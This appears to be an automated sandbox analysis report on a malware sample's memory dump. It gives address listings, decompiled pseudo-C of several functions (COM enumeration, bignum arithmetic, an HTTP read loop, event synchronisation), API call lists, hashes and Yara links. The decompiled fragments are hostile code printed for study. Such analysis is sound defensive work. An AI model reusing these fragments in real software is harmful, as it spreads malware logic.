                                0x04191f77
                                0x04191f77
                                0x04191dfb
                                0x04191e07
                                0x04191f56
                                0x04191f59
                                0x00000000
                                0x04191f59
                                0x04191e0d
                                0x04191e15
                                0x04191e1c
                                0x04191e1f
                                0x04191e68
                                0x04191e68
                                0x04191e7b
                                0x04191e85
                                0x04191e8d
                                0x04191e92
                                0x04191e9c
                                0x04191e9c
                                0x04191e94
                                0x04191e94
                                0x04191e94
                                0x04191e94
                                0x04191ebe
                                0x04191ec6
                                0x04191ef4
                                0x04191ef9
                                0x04191f00
                                0x04191f05
                                0x04191f09
                                0x04191f3b
                                0x04191f0b
                                0x04191f18
                                0x04191f1b
                                0x04191f2b
                                0x04191f2e
                                0x04191f34
                                0x04191f34
                                0x04191ec8
                                0x04191ed5
                                0x04191ed8
                                0x04191eea
                                0x04191eed
                                0x04191eed
                                0x04191f45
                                0x04191f51
                                0x04191f47
                                0x04191f4a
                                0x04191f4a
                                0x04191f45
                                0x04191ebe
                                0x00000000
                                0x04191e85
                                0x04191e2e
                                0x04191e31
                                0x04191e38
                                0x04191e3e
                                0x04191e41
                                0x04191e43
                                0x04191e4f
                                0x04191e52
                                0x04191e52
                                0x04191e58
                                0x04191e5d
                                0x04191e5d
                                0x04191e63
                                0x00000000
                                0x04191e63
                                0x04191d71
                                0x00000000
                                0x04191d85
                                0x04191d85
                                0x04191d87
                                0x04191d92
                                0x00000000
                                0x04191d98
                                0x04191d98
                                0x04191da4
                                0x04191db7
                                0x04191dbd
                                0x04191dc5
                                0x00000000
                                0x04191dc5
                                0x04191d92

                                APIs
                                • lstrcpy.KERNEL32(?,?), ref: 04191DB7
                                  • Part of subcall function 04194AA6: lstrlen.KERNEL32(?,00000000,00000000,04197909,041913D0,?,041955DE,041955DE,?,041955DE,?,00000000,E8FA7DD7,00000000), ref: 04194AAD
                                  • Part of subcall function 04194AA6: mbstowcs.NTDLL ref: 04194AD6
                                  • Part of subcall function 04194AA6: memset.NTDLL ref: 04194AE8
                                  • Part of subcall function 04191F7A: lstrlenW.KERNEL32(?,?,?,04191F20,3D041990,80000002,041930C2,04194106,0A453651,702E7EB2,04194106,?,3D041990,80000002,041930C2,?), ref: 04191F9F
                                  • Part of subcall function 041950CA: HeapFree.KERNEL32(00000000,00000000,04194239,00000000,00000001,?,00000000,?,?,?,04196B8D,00000000,?,00000001), ref: 041950D6
                                • lstrcpy.KERNEL32(?,00000000), ref: 04191DD9
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: ff7b7b74e962a47377ad66a853248ceca0c1910f23acafd90330157b14a1c4c3
                                • Instruction ID: a4c85a15388bcdb6b11f6680daac86fb12d57471141d5cb3073f1b82bda6002f
                                • Opcode Fuzzy Hash: ff7b7b74e962a47377ad66a853248ceca0c1910f23acafd90330157b14a1c4c3
                                • Instruction Fuzzy Hash: D151497260020EBFEF229FA5DD80EAA37FAFF04354F108554F91592160DB35EEA99B10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0419161A, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(00000000), ref: 0419165B
                                • SysFreeString.OLEAUT32(00000000), ref: 0419173E
                                  • Part of subcall function 04196C6D: SysAllocString.OLEAUT32(041992B0), ref: 04196CBD
                                • SafeArrayDestroy.OLEAUT32(?), ref: 04191792
                                • SysFreeString.OLEAUT32(?), ref: 041917A0
                                  • Part of subcall function 04191FC2: Sleep.KERNEL32(000001F4), ref: 0419200A
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                • String ID:
                                • API String ID: 3193056040-0
                                • Opcode ID: 3f70bbd5bb697d2dbd793b51536d82b508b8d708fce58d4a2dc163d351487e9b
                                • Instruction ID: ad00eaad4e7caa40c5cb9d508813a7fa8aaa01883d93fcb72b8609df75a2a17b
                                • Opcode Fuzzy Hash: 3f70bbd5bb697d2dbd793b51536d82b508b8d708fce58d4a2dc163d351487e9b
                                • Instruction Fuzzy Hash: 4C510D76A0024ABFDF04DFE8C8C48AEB7F6FF88344B158869E5159B210DB35AD85CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04196C6D, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 46%
                                			E04196C6D(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x419a2d4; // 0x0
					_t5 = _t102 + 0x419b038; // 0xbc5b15aa
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x41992b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x419a2d4; // 0x0
												_t28 = _t108 + 0x419b0bc; // 0x766ff270
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x419a2d4; // 0x0
														_t33 = _t78 + 0x419b078; // 0xe2c46ab8
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                                0x04196c72
                                0x04196c7b
                                0x04196c7c
                                0x04196c80
                                0x04196c86
                                0x04196c8c
                                0x04196c95
                                0x04196c9b
                                0x04196ca5
                                0x04196ca7
                                0x04196cad
                                0x04196cb2
                                0x04196cbd
                                0x04196cc5
                                0x04196cc8
                                0x04196deb
                                0x04196cce
                                0x04196cce
                                0x04196cdb
                                0x04196ce1
                                0x04196ce7
                                0x04196ceb
                                0x04196cf1
                                0x04196cfe
                                0x04196d02
                                0x04196d08
                                0x04196d0b
                                0x04196d11
                                0x04196d17
                                0x04196d1d
                                0x04196d20
                                0x04196d23
                                0x04196d29
                                0x04196d32
                                0x04196d38
                                0x04196d39
                                0x04196d3c
                                0x04196d3d
                                0x04196d3e
                                0x04196d46
                                0x04196d47
                                0x04196d48
                                0x04196d4a
                                0x04196d4e
                                0x04196d52
                                0x00000000
                                0x00000000
                                0x04196d58
                                0x04196d61
                                0x04196d67
                                0x04196d71
                                0x04196d75
                                0x04196d77
                                0x04196d84
                                0x04196d88
                                0x04196d90
                                0x04196d95
                                0x04196da7
                                0x04196da9
                                0x04196daf
                                0x04196daf
                                0x04196db8
                                0x04196db8
                                0x04196dba
                                0x04196dc0
                                0x04196dc0
                                0x04196dc3
                                0x04196dc9
                                0x04196dcc
                                0x04196dd5
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04196dd5
                                0x04196d29
                                0x04196d23
                                0x04196d0b
                                0x04196ddb
                                0x04196ddb
                                0x04196de1
                                0x04196de1
                                0x04196de7
                                0x04196de7
                                0x04196df0
                                0x04196df6
                                0x04196df6
                                0x04196cb2
                                0x04196dff

                                APIs
                                • SysAllocString.OLEAUT32(041992B0), ref: 04196CBD
                                • lstrcmpW.KERNEL32(00000000,E2C46AB8), ref: 04196D9F
                                • SysFreeString.OLEAUT32(00000000), ref: 04196DB8
                                • SysFreeString.OLEAUT32(?), ref: 04196DE7
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: 1cb6bc19ca711ea71ce3bc60cd2dadba0267cdc5f64087624e335154387e28d0
                                • Instruction ID: 97137f193bb3882c4d923aa15c98910ddd5614f82b1f7ed2c8ef59d9606c48d8
                                • Opcode Fuzzy Hash: 1cb6bc19ca711ea71ce3bc60cd2dadba0267cdc5f64087624e335154387e28d0
                                • Instruction Fuzzy Hash: D6512D75D00519EFCF01DFA8C8888AEB7F9FF89704B188598E915AB314DB75AD41CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04195D93, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                Download Yara Rule
                                C-Code - Quality: 85%
                                			E04195D93(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E041928F1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04191000(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04193915(_t101,  &_v428, _a8, _t96 - _t81);
					E04193915(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E04191000(_t101, 0x419a188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04191000(_a16, _a4);
						E04193B6F(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04197D8C();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04197D86();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E0419679F(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E04195AC5(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04194A54(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x419a188 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                0x04195d96
                                0x04195da2
                                0x04195da8
                                0x04195dad
                                0x04195db1
                                0x04195f23
                                0x04195f27
                                0x04195f27
                                0x04195db7
                                0x04195dbb
                                0x04195dc1
                                0x04195dc2
                                0x04195dcd
                                0x04195dd3
                                0x04195dd8
                                0x04195ddb
                                0x04195df5
                                0x04195e04
                                0x04195e10
                                0x04195e1a
                                0x04195e1f
                                0x04195e21
                                0x04195e24
                                0x04195edb
                                0x04195ee1
                                0x04195ef2
                                0x04195f05
                                0x04195f1b
                                0x00000000
                                0x04195f20
                                0x04195e2d
                                0x04195e34
                                0x04195e38
                                0x04195e3e
                                0x04195e40
                                0x04195e42
                                0x04195e44
                                0x04195e46
                                0x04195e50
                                0x04195e55
                                0x04195e57
                                0x04195e59
                                0x04195e5a
                                0x04195e5b
                                0x04195e5c
                                0x04195e63
                                0x04195e6a
                                0x04195e6d
                                0x04195e6d
                                0x04195e3a
                                0x04195e3a
                                0x04195e3a
                                0x04195e75
                                0x04195e7d
                                0x04195e89
                                0x04195e8e
                                0x04195e8e
                                0x04195e93
                                0x00000000
                                0x00000000
                                0x04195e95
                                0x04195e98
                                0x04195ea5
                                0x00000000
                                0x00000000
                                0x04195ea7
                                0x04195ea7
                                0x04195eb4
                                0x04195e8e
                                0x04195e93
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04195e93
                                0x04195ebe
                                0x04195ec1
                                0x04195ec4
                                0x04195ecb
                                0x04195ecb
                                0x04195ed8
                                0x00000000
                                0x04195ed8
                                0x04195dc4
                                0x04195dc8
                                0x04195dc9
                                0x04195dcb
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04195dcb
                                0x00000000

                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04195E46
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04195E5C
                                • memset.NTDLL ref: 04195F05
                                • memset.NTDLL ref: 04195F1B
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: b363451eb55acbacd57242cb03149718b541e8661933a1dfce6b4ed5224fbe82
                                • Instruction ID: 1c2a8c7b3b8716934cd14f863a3ce9a90d49db51767cfc0b38dfe2233be35bad
                                • Opcode Fuzzy Hash: b363451eb55acbacd57242cb03149718b541e8661933a1dfce6b4ed5224fbe82
                                • Instruction Fuzzy Hash: 0B419032B00219BBEF119E68CC80BEE77E5AF45354F104569F919A7180DB71BE548B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 041914A8, Relevance: 6.1, APIs: 4, Instructions: 120synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 57%
                                			E041914A8(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_push( &_v24);
							_push(1);
							_push(0);
							if( *0x419a144() != 0) {
								_v8 = 8;
							} else {
								_t47 = E04196837(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0x419a2c4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E041950CA(_v20);
											if(_v8 == 0) {
												_v8 = E041937FC(_v24, _t74);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E041925C7(__eax);
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

























                                0x041914a9
                                0x041914af
                                0x041914ba
                                0x041914ba
                                0x041914bc
                                0x04195aff
                                0x04195b02
                                0x04195b0b
                                0x04195b0e
                                0x04195b11
                                0x04195b19
                                0x04195c17
                                0x04195c22
                                0x04195c25
                                0x04195c27
                                0x00000000
                                0x04195c27
                                0x04195b1f
                                0x04195b22
                                0x04195c2a
                                0x04195c2a
                                0x04195b28
                                0x04195b2b
                                0x04195b2c
                                0x04195b2e
                                0x04195b37
                                0x04195c0e
                                0x04195b3d
                                0x04195b43
                                0x04195b4a
                                0x04195b4d
                                0x04195bfc
                                0x04195b53
                                0x00000000
                                0x04195b53
                                0x04195b53
                                0x04195b53
                                0x04195b53
                                0x04195b58
                                0x04195b5a
                                0x04195b5a
                                0x04195b67
                                0x04195b6f
                                0x00000000
                                0x00000000
                                0x04195b71
                                0x04195b7e
                                0x04195b84
                                0x04195b84
                                0x04195b87
                                0x00000000
                                0x00000000
                                0x04195b89
                                0x04195b94
                                0x04195ba8
                                0x04195bde
                                0x04195baa
                                0x04195baa
                                0x04195bb1
                                0x04195bb9
                                0x00000000
                                0x04195bbb
                                0x04195bbb
                                0x04195bc6
                                0x04195bc9
                                0x04195bd0
                                0x00000000
                                0x04195bd0
                                0x04195bc9
                                0x04195bb9
                                0x04195be1
                                0x04195be4
                                0x04195bec
                                0x04195bf7
                                0x04195bf7
                                0x00000000
                                0x04195bec
                                0x04195b91
                                0x00000000
                                0x04195bd3
                                0x04195bd3
                                0x00000000
                                0x04195bdc
                                0x04195c03
                                0x04195c03
                                0x04195c09
                                0x04195c09
                                0x04195b37
                                0x04195b22
                                0x04195c34
                                0x041914b1
                                0x041914b1
                                0x041914b8
                                0x041914c3
                                0x00000000
                                0x00000000
                                0x00000000
                                0x041914b8

                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,04197134,00000000,?), ref: 04195B9B
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,04197134,00000000,?,?), ref: 04195BBB
                                  • Part of subcall function 041925C7: wcstombs.NTDLL ref: 04192687
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: ErrorLastObjectSingleWaitwcstombs
                                • String ID:
                                • API String ID: 2344289193-0
                                • Opcode ID: 879920a430424f3202c92fad325bd0f27b1482c0c04f2f6d907e9dc6bd18b3ab
                                • Instruction ID: 398b5a79ed7d5d18f46ef4f88d2c93f4ef60ac687702ad62f5f71bfcebd3f4b6
                                • Opcode Fuzzy Hash: 879920a430424f3202c92fad325bd0f27b1482c0c04f2f6d907e9dc6bd18b3ab
                                • Instruction Fuzzy Hash: 73411AB2A00209FFDF119FA5D9C49AEB7FAFB04344F1444A9E412F7250E734AE849B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04195C35, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 04195C8C
                                • SysAllocString.OLEAUT32(04191E05), ref: 04195CCF
                                • SysFreeString.OLEAUT32(00000000), ref: 04195CE3
                                • SysFreeString.OLEAUT32(00000000), ref: 04195CF1
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 9f58d10403d8ced14164755198fd83afeee7914153d9c524de6a78667fe88601
                                • Instruction ID: 8d589344ca98753d5c2d4a5f29d2ec64610323102623f2c2cca3a046350bbb96
                                • Opcode Fuzzy Hash: 9f58d10403d8ced14164755198fd83afeee7914153d9c524de6a78667fe88601
                                • Instruction Fuzzy Hash: 3831E772900209FFCB06DF99D4C48AE7BF9FF48340B20846EE905A7210D735AA85DBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 041973C3, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E041973C3(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x419a2c8; // 0x0
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x419a2d4; // 0x0
				_t3 = _t8 + 0x419b8a2; // 0x2b8b8603
				_t25 = 0;
				_t30 = E04192DEA(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x419a2f8, 1, 0, _t30);
					E041950CA(_t30);
				}
				_t12 =  *0x419a2b4; // 0x42ee000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E0419513E() == 0) {
						_t28 =  *0x419a120( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E04196BE1(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E041951A8(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}















                                0x041973c4
                                0x041973cb
                                0x041973d5
                                0x041973d9
                                0x041973df
                                0x041973ec
                                0x041973f3
                                0x041973f7
                                0x04197409
                                0x0419740b
                                0x0419740b
                                0x04197410
                                0x04197417
                                0x04197422
                                0x04197438
                                0x0419743c
                                0x0419743e
                                0x04197443
                                0x04197443
                                0x04197450
                                0x04197454
                                0x04197458
                                0x00000000
                                0x00000000
                                0x04197466
                                0x0419746a
                                0x00000000
                                0x00000000
                                0x0419746a
                                0x04197454
                                0x00000000
                                0x0419746c
                                0x0419746c
                                0x0419746c
                                0x04197472
                                0x04197474
                                0x04197474
                                0x0419747e
                                0x04197482
                                0x04197494
                                0x04197494
                                0x04197498
                                0x0419749e
                                0x0419749e
                                0x041974a1
                                0x041974a3
                                0x041974a6
                                0x041974a6
                                0x041974ad
                                0x041974b3
                                0x041974b3

                                APIs
                                  • Part of subcall function 04192DEA: lstrlen.KERNEL32(E8FA7DD7,00000000,00000000,00000027,00000000,00000000,04197909,041955DE,?,00000000,E8FA7DD7,00000000,?,?,?,041955DE), ref: 04192E20
                                  • Part of subcall function 04192DEA: lstrcpy.KERNEL32(00000000,00000000), ref: 04192E44
                                  • Part of subcall function 04192DEA: lstrcat.KERNEL32(00000000,00000000), ref: 04192E4C
                                • CreateEventA.KERNEL32(0419A2F8,00000001,00000000,00000000,2B8B8603,00000001,00000000,?,?,00000000,?,041930E1,?,?,?), ref: 04197402
                                  • Part of subcall function 041950CA: HeapFree.KERNEL32(00000000,00000000,04194239,00000000,00000001,?,00000000,?,?,?,04196B8D,00000000,?,00000001), ref: 041950D6
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,041930E1,00000000,?,00000000,?,041930E1,?,?,?,?,?,?,?,0419211B), ref: 04197460
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,2B8B8603,00000001,00000000,?,?,00000000,?,041930E1,?,?,?), ref: 0419748E
                                • CloseHandle.KERNEL32(00000000,2B8B8603,00000001,00000000,?,?,00000000,?,041930E1,?,?,?), ref: 041974A6
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 73268831-0
